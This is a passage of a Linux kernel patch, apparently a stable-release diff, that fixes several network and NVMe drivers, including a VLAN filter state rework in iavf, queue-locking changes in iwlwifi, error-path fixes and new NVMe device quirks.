+-		u8 is_new_vlan:1;	/* filter is new, wait for PF answer */
+-		u8 remove:1;		/* filter needs to be removed */
+-		u8 add:1;		/* filter needs to be added */
+-		u8 padding:5;
+-	};
++	enum iavf_vlan_state_t state;
+ };
+ 
+ #define IAVF_MAX_TRAFFIC_CLASS	4
+@@ -257,6 +260,7 @@ struct iavf_adapter {
+ 	wait_queue_head_t vc_waitqueue;
+ 	struct iavf_q_vector *q_vectors;
+ 	struct list_head vlan_filter_list;
++	int num_vlan_filters;
+ 	struct list_head mac_filter_list;
+ 	struct mutex crit_lock;
+ 	struct mutex client_lock;
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 5f8fff6c701fc..34711a88dbaa0 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -791,7 +791,8 @@ iavf_vlan_filter *iavf_add_vlan(struct iavf_adapter *adapter,
+ 		f->vlan = vlan;
+ 
+ 		list_add_tail(&f->list, &adapter->vlan_filter_list);
+-		f->add = true;
++		f->state = IAVF_VLAN_ADD;
++		adapter->num_vlan_filters++;
+ 		adapter->aq_required |= IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+ 	}
+ 
+@@ -813,7 +814,7 @@ static void iavf_del_vlan(struct iavf_adapter *adapter, struct iavf_vlan vlan)
+ 
+ 	f = iavf_find_vlan(adapter, vlan);
+ 	if (f) {
+-		f->remove = true;
++		f->state = IAVF_VLAN_REMOVE;
+ 		adapter->aq_required |= IAVF_FLAG_AQ_DEL_VLAN_FILTER;
+ 	}
+ 
+@@ -828,14 +829,18 @@ static void iavf_del_vlan(struct iavf_adapter *adapter, struct iavf_vlan vlan)
+  **/
+ static void iavf_restore_filters(struct iavf_adapter *adapter)
+ {
+-	u16 vid;
++	struct iavf_vlan_filter *f;
+ 
+ 	/* re-add all VLAN filters */
+-	for_each_set_bit(vid, adapter->vsi.active_cvlans, VLAN_N_VID)
+-		iavf_add_vlan(adapter, IAVF_VLAN(vid, ETH_P_8021Q));
++	spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 
+-	for_each_set_bit(vid, adapter->vsi.active_svlans, VLAN_N_VID)
+-		iavf_add_vlan(adapter, IAVF_VLAN(vid, ETH_P_8021AD));
++	list_for_each_entry(f, &adapter->vlan_filter_list, list) {
++		if (f->state == IAVF_VLAN_INACTIVE)
++			f->state = IAVF_VLAN_ADD;
++	}
++
++	spin_unlock_bh(&adapter->mac_vlan_list_lock);
++	adapter->aq_required |= IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+ }
+ 
+ /**
+@@ -844,8 +849,7 @@ static void iavf_restore_filters(struct iavf_adapter *adapter)
+  */
+ u16 iavf_get_num_vlans_added(struct iavf_adapter *adapter)
+ {
+-	return bitmap_weight(adapter->vsi.active_cvlans, VLAN_N_VID) +
+-		bitmap_weight(adapter->vsi.active_svlans, VLAN_N_VID);
++	return adapter->num_vlan_filters;
+ }
+ 
+ /**
+@@ -928,11 +932,6 @@ static int iavf_vlan_rx_kill_vid(struct net_device *netdev,
+ 		return 0;
+ 
+ 	iavf_del_vlan(adapter, IAVF_VLAN(vid, be16_to_cpu(proto)));
+-	if (proto == cpu_to_be16(ETH_P_8021Q))
+-		clear_bit(vid, adapter->vsi.active_cvlans);
+-	else
+-		clear_bit(vid, adapter->vsi.active_svlans);
+-
+ 	return 0;
+ }
+ 
+@@ -1293,16 +1292,11 @@ static void iavf_clear_mac_vlan_filters(struct iavf_adapter *adapter)
+ 		}
+ 	}
+ 
+-	/* remove all VLAN filters */
++	/* disable all VLAN filters */
+ 	list_for_each_entry_safe(vlf, vlftmp, &adapter->vlan_filter_list,
+-				 list) {
+-		if (vlf->add) {
+-			list_del(&vlf->list);
+-			kfree(vlf);
+-		} else {
+-			vlf->remove = true;
+-		}
+-	}
++				 list)
++		vlf->state = IAVF_VLAN_DISABLE;
++
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ }
+ 
+@@ -2905,6 +2899,7 @@ static void iavf_disable_vf(struct iavf_adapter *adapter)
+ 		list_del(&fv->list);
+ 		kfree(fv);
+ 	}
++	adapter->num_vlan_filters = 0;
+ 
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ 
+@@ -3122,9 +3117,6 @@ continue_reset:
+ 	adapter->aq_required |= IAVF_FLAG_AQ_ADD_CLOUD_FILTER;
+ 	iavf_misc_irq_enable(adapter);
+ 
+-	bitmap_clear(adapter->vsi.active_cvlans, 0, VLAN_N_VID);
+-	bitmap_clear(adapter->vsi.active_svlans, 0, VLAN_N_VID);
+-
+ 	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 2);
+ 
+ 	/* We were running when the reset started, so we need to restore some
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 2c03ca01fdd9c..00dccdd290dce 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -642,16 +642,10 @@ static void iavf_vlan_add_reject(struct iavf_adapter *adapter)
+ 
+ 	spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 	list_for_each_entry_safe(f, ftmp, &adapter->vlan_filter_list, list) {
+-		if (f->is_new_vlan) {
+-			if (f->vlan.tpid == ETH_P_8021Q)
+-				clear_bit(f->vlan.vid,
+-					  adapter->vsi.active_cvlans);
+-			else
+-				clear_bit(f->vlan.vid,
+-					  adapter->vsi.active_svlans);
+-
++		if (f->state == IAVF_VLAN_IS_NEW) {
+ 			list_del(&f->list);
+ 			kfree(f);
++			adapter->num_vlan_filters--;
+ 		}
+ 	}
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+@@ -679,7 +673,7 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 	spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 
+ 	list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-		if (f->add)
++		if (f->state == IAVF_VLAN_ADD)
+ 			count++;
+ 	}
+ 	if (!count || !VLAN_FILTERING_ALLOWED(adapter)) {
+@@ -710,11 +704,10 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 		vvfl->vsi_id = adapter->vsi_res->vsi_id;
+ 		vvfl->num_elements = count;
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-			if (f->add) {
++			if (f->state == IAVF_VLAN_ADD) {
+ 				vvfl->vlan_id[i] = f->vlan.vid;
+ 				i++;
+-				f->add = false;
+-				f->is_new_vlan = true;
++				f->state = IAVF_VLAN_IS_NEW;
+ 				if (i == count)
+ 					break;
+ 			}
+@@ -760,7 +753,7 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 		vvfl_v2->vport_id = adapter->vsi_res->vsi_id;
+ 		vvfl_v2->num_elements = count;
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-			if (f->add) {
++			if (f->state == IAVF_VLAN_ADD) {
+ 				struct virtchnl_vlan_supported_caps *filtering_support =
+ 					&adapter->vlan_v2_caps.filtering.filtering_support;
+ 				struct virtchnl_vlan *vlan;
+@@ -778,8 +771,7 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 				vlan->tpid = f->vlan.tpid;
+ 
+ 				i++;
+-				f->add = false;
+-				f->is_new_vlan = true;
++				f->state = IAVF_VLAN_IS_NEW;
+ 			}
+ 		}
+ 
+@@ -822,10 +814,16 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 		 * filters marked for removal to enable bailing out before
+ 		 * sending a virtchnl message
+ 		 */
+-		if (f->remove && !VLAN_FILTERING_ALLOWED(adapter)) {
++		if (f->state == IAVF_VLAN_REMOVE &&
++		    !VLAN_FILTERING_ALLOWED(adapter)) {
+ 			list_del(&f->list);
+ 			kfree(f);
+-		} else if (f->remove) {
++			adapter->num_vlan_filters--;
++		} else if (f->state == IAVF_VLAN_DISABLE &&
++		    !VLAN_FILTERING_ALLOWED(adapter)) {
++			f->state = IAVF_VLAN_INACTIVE;
++		} else if (f->state == IAVF_VLAN_REMOVE ||
++			   f->state == IAVF_VLAN_DISABLE) {
+ 			count++;
+ 		}
+ 	}
+@@ -857,11 +855,18 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 		vvfl->vsi_id = adapter->vsi_res->vsi_id;
+ 		vvfl->num_elements = count;
+ 		list_for_each_entry_safe(f, ftmp, &adapter->vlan_filter_list, list) {
+-			if (f->remove) {
++			if (f->state == IAVF_VLAN_DISABLE) {
+ 				vvfl->vlan_id[i] = f->vlan.vid;
++				f->state = IAVF_VLAN_INACTIVE;
+ 				i++;
++				if (i == count)
++					break;
++			} else if (f->state == IAVF_VLAN_REMOVE) {
++				vvfl->vlan_id[i] = f->vlan.vid;
+ 				list_del(&f->list);
+ 				kfree(f);
++				adapter->num_vlan_filters--;
++				i++;
+ 				if (i == count)
+ 					break;
+ 			}
+@@ -901,7 +906,8 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 		vvfl_v2->vport_id = adapter->vsi_res->vsi_id;
+ 		vvfl_v2->num_elements = count;
+ 		list_for_each_entry_safe(f, ftmp, &adapter->vlan_filter_list, list) {
+-			if (f->remove) {
++			if (f->state == IAVF_VLAN_DISABLE ||
++			    f->state == IAVF_VLAN_REMOVE) {
+ 				struct virtchnl_vlan_supported_caps *filtering_support =
+ 					&adapter->vlan_v2_caps.filtering.filtering_support;
+ 				struct virtchnl_vlan *vlan;
+@@ -915,8 +921,13 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 				vlan->tci = f->vlan.vid;
+ 				vlan->tpid = f->vlan.tpid;
+ 
+-				list_del(&f->list);
+-				kfree(f);
++				if (f->state == IAVF_VLAN_DISABLE) {
++					f->state = IAVF_VLAN_INACTIVE;
++				} else {
++					list_del(&f->list);
++					kfree(f);
++					adapter->num_vlan_filters--;
++				}
+ 				i++;
+ 				if (i == count)
+ 					break;
+@@ -2192,7 +2203,7 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 				list_for_each_entry(vlf,
+ 						    &adapter->vlan_filter_list,
+ 						    list)
+-					vlf->add = true;
++					vlf->state = IAVF_VLAN_ADD;
+ 
+ 				adapter->aq_required |=
+ 					IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+@@ -2252,7 +2263,7 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 				list_for_each_entry(vlf,
+ 						    &adapter->vlan_filter_list,
+ 						    list)
+-					vlf->add = true;
++					vlf->state = IAVF_VLAN_ADD;
+ 
+ 				aq_required |= IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+ 			}
+@@ -2436,15 +2447,8 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 
+ 		spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-			if (f->is_new_vlan) {
+-				f->is_new_vlan = false;
+-				if (f->vlan.tpid == ETH_P_8021Q)
+-					set_bit(f->vlan.vid,
+-						adapter->vsi.active_cvlans);
+-				else
+-					set_bit(f->vlan.vid,
+-						adapter->vsi.active_svlans);
+-			}
++			if (f->state == IAVF_VLAN_IS_NEW)
++				f->state = IAVF_VLAN_ACTIVE;
+ 		}
+ 		spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ 		}
+diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c
+index 87f76bac2e463..eb827b86ecae8 100644
+--- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c
++++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c
+@@ -628,7 +628,13 @@ int qlcnic_fw_create_ctx(struct qlcnic_adapter *dev)
+ 	int i, err, ring;
+ 
+ 	if (dev->flags & QLCNIC_NEED_FLR) {
+-		pci_reset_function(dev->pdev);
++		err = pci_reset_function(dev->pdev);
++		if (err) {
++			dev_err(&dev->pdev->dev,
++				"Adapter reset failed (%d). Please reboot\n",
++				err);
++			return err;
++		}
+ 		dev->flags &= ~QLCNIC_NEED_FLR;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/sun/niu.c b/drivers/net/ethernet/sun/niu.c
+index e6144d963eaaa..4bbf011d53e69 100644
+--- a/drivers/net/ethernet/sun/niu.c
++++ b/drivers/net/ethernet/sun/niu.c
+@@ -4522,7 +4522,7 @@ static int niu_alloc_channels(struct niu *np)
+ 
+ 		err = niu_rbr_fill(np, rp, GFP_KERNEL);
+ 		if (err)
+-			return err;
++			goto out_err;
+ 	}
+ 
+ 	tx_rings = kcalloc(num_tx_rings, sizeof(struct tx_ring_info),
+diff --git a/drivers/net/phy/nxp-c45-tja11xx.c b/drivers/net/phy/nxp-c45-tja11xx.c
+index 5813b07242ce1..029875a59ff89 100644
+--- a/drivers/net/phy/nxp-c45-tja11xx.c
++++ b/drivers/net/phy/nxp-c45-tja11xx.c
+@@ -191,7 +191,7 @@
+ #define MAX_ID_PS			2260U
+ #define DEFAULT_ID_PS			2000U
+ 
+-#define PPM_TO_SUBNS_INC(ppb)	div_u64(GENMASK(31, 0) * (ppb) * \
++#define PPM_TO_SUBNS_INC(ppb)	div_u64(GENMASK_ULL(31, 0) * (ppb) * \
+ 					PTP_CLK_PERIOD_100BT1, NSEC_PER_SEC)
+ 
+ #define NXP_C45_SKB_CB(skb)	((struct nxp_c45_skb_cb *)(skb)->cb)
+@@ -1337,6 +1337,17 @@ no_ptp_support:
+ 	return ret;
+ }
+ 
++static void nxp_c45_remove(struct phy_device *phydev)
++{
++	struct nxp_c45_phy *priv = phydev->priv;
++
++	if (priv->ptp_clock)
++		ptp_clock_unregister(priv->ptp_clock);
++
++	skb_queue_purge(&priv->tx_queue);
++	skb_queue_purge(&priv->rx_queue);
++}
++
+ static struct phy_driver nxp_c45_driver[] = {
+ 	{
+ 		PHY_ID_MATCH_MODEL(PHY_ID_TJA_1103),
+@@ -1359,6 +1370,7 @@ static struct phy_driver nxp_c45_driver[] = {
+ 		.set_loopback		= genphy_c45_loopback,
+ 		.get_sqi		= nxp_c45_get_sqi,
+ 		.get_sqi_max		= nxp_c45_get_sqi_max,
++		.remove			= nxp_c45_remove,
+ 	},
+ };
+ 
+diff --git a/drivers/net/phy/sfp.c b/drivers/net/phy/sfp.c
+index 40c9a64c5e301..5663a184644d5 100644
+--- a/drivers/net/phy/sfp.c
++++ b/drivers/net/phy/sfp.c
+@@ -212,6 +212,12 @@ static const enum gpiod_flags gpio_flags[] = {
+ #define SFP_PHY_ADDR		22
+ #define SFP_PHY_ADDR_ROLLBALL	17
+ 
++/* SFP_EEPROM_BLOCK_SIZE is the size of data chunk to read the EEPROM
++ * at a time. Some SFP modules and also some Linux I2C drivers do not like
++ * reads longer than 16 bytes.
++ */
++#define SFP_EEPROM_BLOCK_SIZE	16
++
+ struct sff_data {
+ 	unsigned int gpios;
+ 	bool (*module_supported)(const struct sfp_eeprom_id *id);
+@@ -1928,11 +1934,7 @@ static int sfp_sm_mod_probe(struct sfp *sfp, bool report)
+ 	u8 check;
+ 	int ret;
+ 
+-	/* Some SFP modules and also some Linux I2C drivers do not like reads
+-	 * longer than 16 bytes, so read the EEPROM in chunks of 16 bytes at
+-	 * a time.
+-	 */
+-	sfp->i2c_block_size = 16;
++	sfp->i2c_block_size = SFP_EEPROM_BLOCK_SIZE;
+ 
+ 	ret = sfp_read(sfp, false, 0, &id.base, sizeof(id.base));
+ 	if (ret < 0) {
+@@ -2615,6 +2617,7 @@ static struct sfp *sfp_alloc(struct device *dev)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	sfp->dev = dev;
++	sfp->i2c_block_size = SFP_EEPROM_BLOCK_SIZE;
+ 
+ 	mutex_init(&sfp->sm_mutex);
+ 	mutex_init(&sfp->st_mutex);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+index 8464c9b7baf1f..a841268e0709f 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+@@ -729,7 +729,10 @@ void iwl_mvm_mac_itxq_xmit(struct ieee80211_hw *hw, struct ieee80211_txq *txq)
+ 
+ 	rcu_read_lock();
+ 	do {
+-		while (likely(!mvmtxq->stopped &&
++		while (likely(!test_bit(IWL_MVM_TXQ_STATE_STOP_FULL,
++					&mvmtxq->state) &&
++			      !test_bit(IWL_MVM_TXQ_STATE_STOP_REDIRECT,
++					&mvmtxq->state) &&
+ 			      !test_bit(IWL_MVM_STATUS_IN_D3, &mvm->status))) {
+ 			skb = ieee80211_tx_dequeue(hw, txq);
+ 
+@@ -754,42 +757,25 @@ static void iwl_mvm_mac_wake_tx_queue(struct ieee80211_hw *hw,
+ 	struct iwl_mvm *mvm = IWL_MAC80211_GET_MVM(hw);
+ 	struct iwl_mvm_txq *mvmtxq = iwl_mvm_txq_from_mac80211(txq);
+ 
+-	/*
+-	 * Please note that racing is handled very carefully here:
+-	 * mvmtxq->txq_id is updated during allocation, and mvmtxq->list is
+-	 * deleted afterwards.
+-	 * This means that if:
+-	 * mvmtxq->txq_id != INVALID_QUEUE && list_empty(&mvmtxq->list):
+-	 *	queue is allocated and we can TX.
+-	 * mvmtxq->txq_id != INVALID_QUEUE && !list_empty(&mvmtxq->list):
+-	 *	a race, should defer the frame.
+-	 * mvmtxq->txq_id == INVALID_QUEUE && list_empty(&mvmtxq->list):
+-	 *	need to allocate the queue and defer the frame.
+-	 * mvmtxq->txq_id == INVALID_QUEUE && !list_empty(&mvmtxq->list):
+-	 *	queue is already scheduled for allocation, no need to allocate,
+-	 *	should defer the frame.
+-	 */
+-
+-	/* If the queue is allocated TX and return. */
+-	if (!txq->sta || mvmtxq->txq_id != IWL_MVM_INVALID_QUEUE) {
+-		/*
+-		 * Check that list is empty to avoid a race where txq_id is
+-		 * already updated, but the queue allocation work wasn't
+-		 * finished
+-		 */
+-		if (unlikely(txq->sta && !list_empty(&mvmtxq->list)))
+-			return;
+-
++	if (likely(test_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state)) ||
++	    !txq->sta) {
+ 		iwl_mvm_mac_itxq_xmit(hw, txq);
+ 		return;
+ 	}
+ 
+-	/* The list is being deleted only after the queue is fully allocated. */
+-	if (!list_empty(&mvmtxq->list))
+-		return;
++	/* iwl_mvm_mac_itxq_xmit() will later be called by the worker
++	 * to handle any packets we leave on the txq now
++	 */
+ 
+-	list_add_tail(&mvmtxq->list, &mvm->add_stream_txqs);
+-	schedule_work(&mvm->add_stream_wk);
++	spin_lock_bh(&mvm->add_stream_lock);
++	/* The list is being deleted only after the queue is fully allocated. */
++	if (list_empty(&mvmtxq->list) &&
++	    /* recheck under lock */
++	    !test_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state)) {
++		list_add_tail(&mvmtxq->list, &mvm->add_stream_txqs);
++		schedule_work(&mvm->add_stream_wk);
++	}
++	spin_unlock_bh(&mvm->add_stream_lock);
+ }
+ 
+ #define CHECK_BA_TRIGGER(_mvm, _trig, _tid_bm, _tid, _fmt...)		\
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h b/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
+index 1ccb3cad7cdc1..f5c921c41be56 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
+@@ -729,7 +729,10 @@ struct iwl_mvm_txq {
+ 	struct list_head list;
+ 	u16 txq_id;
+ 	atomic_t tx_request;
+-	bool stopped;
++#define IWL_MVM_TXQ_STATE_STOP_FULL	0
++#define IWL_MVM_TXQ_STATE_STOP_REDIRECT	1
++#define IWL_MVM_TXQ_STATE_READY		2
++	unsigned long state;
+ };
+ 
+ static inline struct iwl_mvm_txq *
+@@ -827,6 +830,7 @@ struct iwl_mvm {
+ 		struct iwl_mvm_tvqm_txq_info tvqm_info[IWL_MAX_TVQM_QUEUES];
+ 	};
+ 	struct work_struct add_stream_wk; /* To add streams to queues */
++	spinlock_t add_stream_lock;
+ 
+ 	const char *nvm_file_name;
+ 	struct iwl_nvm_data *nvm_data;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+index 5b8e9a06f6d4a..994f597a7102a 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+@@ -1184,6 +1184,7 @@ iwl_op_mode_mvm_start(struct iwl_trans *trans, const struct iwl_cfg *cfg,
+ 	INIT_DELAYED_WORK(&mvm->scan_timeout_dwork, iwl_mvm_scan_timeout_wk);
+ 	INIT_WORK(&mvm->add_stream_wk, iwl_mvm_add_new_dqa_stream_wk);
+ 	INIT_LIST_HEAD(&mvm->add_stream_txqs);
++	spin_lock_init(&mvm->add_stream_lock);
+ 
+ 	init_waitqueue_head(&mvm->rx_sync_waitq);
+ 
+@@ -1680,7 +1681,10 @@ static void iwl_mvm_queue_state_change(struct iwl_op_mode *op_mode,
+ 
+ 		txq = sta->txq[tid];
+ 		mvmtxq = iwl_mvm_txq_from_mac80211(txq);
+-		mvmtxq->stopped = !start;
++		if (start)
++			clear_bit(IWL_MVM_TXQ_STATE_STOP_FULL, &mvmtxq->state);
++		else
++			set_bit(IWL_MVM_TXQ_STATE_STOP_FULL, &mvmtxq->state);
+ 
+ 		if (start && mvmsta->sta_state != IEEE80211_STA_NOTEXIST)
+ 			iwl_mvm_mac_itxq_xmit(mvm->hw, txq);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/sta.c b/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
+index cbd8053a9e35a..013aca70c3d3b 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
+@@ -383,8 +383,11 @@ static int iwl_mvm_disable_txq(struct iwl_mvm *mvm, struct ieee80211_sta *sta,
+ 		struct iwl_mvm_txq *mvmtxq =
+ 			iwl_mvm_txq_from_tid(sta, tid);
+ 
+-		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_lock_bh(&mvm->add_stream_lock);
+ 		list_del_init(&mvmtxq->list);
++		clear_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_unlock_bh(&mvm->add_stream_lock);
+ 	}
+ 
+ 	/* Regardless if this is a reserved TXQ for a STA - mark it as false */
+@@ -478,8 +481,11 @@ static int iwl_mvm_remove_sta_queue_marking(struct iwl_mvm *mvm, int queue)
+ 			disable_agg_tids |= BIT(tid);
+ 		mvmsta->tid_data[tid].txq_id = IWL_MVM_INVALID_QUEUE;
+ 
+-		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_lock_bh(&mvm->add_stream_lock);
+ 		list_del_init(&mvmtxq->list);
++		clear_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_unlock_bh(&mvm->add_stream_lock);
+ 	}
+ 
+ 	mvmsta->tfd_queue_msk &= ~BIT(queue); /* Don't use this queue anymore */
+@@ -692,7 +698,7 @@ static int iwl_mvm_redirect_queue(struct iwl_mvm *mvm, int queue, int tid,
+ 			    queue, iwl_mvm_ac_to_tx_fifo[ac]);
+ 
+ 	/* Stop the queue and wait for it to empty */
+-	txq->stopped = true;
++	set_bit(IWL_MVM_TXQ_STATE_STOP_REDIRECT, &txq->state);
+ 
+ 	ret = iwl_trans_wait_tx_queues_empty(mvm->trans, BIT(queue));
+ 	if (ret) {
+@@ -735,7 +741,7 @@ static int iwl_mvm_redirect_queue(struct iwl_mvm *mvm, int queue, int tid,
+ 
+ out:
+ 	/* Continue using the queue */
+-	txq->stopped = false;
++	clear_bit(IWL_MVM_TXQ_STATE_STOP_REDIRECT, &txq->state);
+ 
+ 	return ret;
+ }
+@@ -1443,12 +1449,22 @@ void iwl_mvm_add_new_dqa_stream_wk(struct work_struct *wk)
+ 		 * a queue in the function itself.
+ 		 */
+ 		if (iwl_mvm_sta_alloc_queue(mvm, txq->sta, txq->ac, tid)) {
++			spin_lock_bh(&mvm->add_stream_lock);
+ 			list_del_init(&mvmtxq->list);
++			spin_unlock_bh(&mvm->add_stream_lock);
+ 			continue;
+ 		}
+ 
+-		list_del_init(&mvmtxq->list);
++		/* now we're ready, any remaining races/concurrency will be
++		 * handled in iwl_mvm_mac_itxq_xmit()
++		 */
++		set_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++
+ 		local_bh_disable();
++		spin_lock(&mvm->add_stream_lock);
++		list_del_init(&mvmtxq->list);
++		spin_unlock(&mvm->add_stream_lock);
++
+ 		iwl_mvm_mac_itxq_xmit(mvm->hw, txq);
+ 		local_bh_enable();
+ 	}
+@@ -1862,8 +1878,11 @@ static void iwl_mvm_disable_sta_queues(struct iwl_mvm *mvm,
+ 		struct iwl_mvm_txq *mvmtxq =
+ 			iwl_mvm_txq_from_mac80211(sta->txq[i]);
+ 
++		spin_lock_bh(&mvm->add_stream_lock);
+ 		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
+ 		list_del_init(&mvmtxq->list);
++		clear_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++		spin_unlock_bh(&mvm->add_stream_lock);
+ 	}
+ }
+ 
+diff --git a/drivers/net/wireless/marvell/mwifiex/pcie.c b/drivers/net/wireless/marvell/mwifiex/pcie.c
+index 5dcf61761a165..9a698a16a8f38 100644
+--- a/drivers/net/wireless/marvell/mwifiex/pcie.c
++++ b/drivers/net/wireless/marvell/mwifiex/pcie.c
+@@ -172,7 +172,7 @@ static const struct mwifiex_pcie_device mwifiex_pcie8997 = {
+ 	.can_ext_scan = true,
+ };
+ 
+-static const struct of_device_id mwifiex_pcie_of_match_table[] = {
++static const struct of_device_id mwifiex_pcie_of_match_table[] __maybe_unused = {
+ 	{ .compatible = "pci11ab,2b42" },
+ 	{ .compatible = "pci1b4b,2b42" },
+ 	{ }
+diff --git a/drivers/net/wireless/marvell/mwifiex/sdio.c b/drivers/net/wireless/marvell/mwifiex/sdio.c
+index 9f506efa53705..ea1c1c2412e72 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sdio.c
++++ b/drivers/net/wireless/marvell/mwifiex/sdio.c
+@@ -479,7 +479,7 @@ static struct memory_type_mapping mem_type_mapping_tbl[] = {
+ 	{"EXTLAST", NULL, 0, 0xFE},
+ };
+ 
+-static const struct of_device_id mwifiex_sdio_of_match_table[] = {
++static const struct of_device_id mwifiex_sdio_of_match_table[] __maybe_unused = {
+ 	{ .compatible = "marvell,sd8787" },
+ 	{ .compatible = "marvell,sd8897" },
+ 	{ .compatible = "marvell,sd8997" },
+diff --git a/drivers/net/wwan/iosm/iosm_ipc_pcie.c b/drivers/net/wwan/iosm/iosm_ipc_pcie.c
+index 5bf5a93937c9c..04517bd3325a2 100644
+--- a/drivers/net/wwan/iosm/iosm_ipc_pcie.c
++++ b/drivers/net/wwan/iosm/iosm_ipc_pcie.c
+@@ -295,7 +295,7 @@ static int ipc_pcie_probe(struct pci_dev *pci,
+ 	ret = dma_set_mask(ipc_pcie->dev, DMA_BIT_MASK(64));
+ 	if (ret) {
+ 		dev_err(ipc_pcie->dev, "Could not set PCI DMA mask: %d", ret);
+-		return ret;
++		goto set_mask_fail;
+ 	}
+ 
+ 	ipc_pcie_config_aspm(ipc_pcie);
+@@ -323,6 +323,7 @@ static int ipc_pcie_probe(struct pci_dev *pci,
+ imem_init_fail:
+ 	ipc_pcie_resources_release(ipc_pcie);
+ resources_req_fail:
++set_mask_fail:
+ 	pci_disable_device(pci);
+ pci_enable_fail:
+ 	kfree(ipc_pcie);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index cb71ce3413c2d..c54c6ffba0bcd 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -3074,7 +3074,8 @@ static int nvme_init_non_mdts_limits(struct nvme_ctrl *ctrl)
+ 	else
+ 		ctrl->max_zeroes_sectors = 0;
+ 
+-	if (nvme_ctrl_limited_cns(ctrl))
++	if (ctrl->subsys->subtype != NVME_NQN_NVME ||
++	    nvme_ctrl_limited_cns(ctrl))
+ 		return 0;
+ 
+ 	id = kzalloc(sizeof(*id), GFP_KERNEL);
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 60452f6a9f711..581bf94416e6d 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3550,6 +3550,9 @@ static const struct pci_device_id nvme_id_table[] = {
+ 	{ PCI_DEVICE(0x1d97, 0x1d97), /* Lexar NM620 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1d97, 0x2269), /* Lexar NM760 */
++		.driver_data = NVME_QUIRK_BOGUS_NID |
++				NVME_QUIRK_IGNORE_DEV_SUBNQN, },
++	{ PCI_DEVICE(0x10ec, 0x5763), /* TEAMGROUP T-FORCE CARDEA ZERO Z330 SSD */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMAZON, 0x0061),
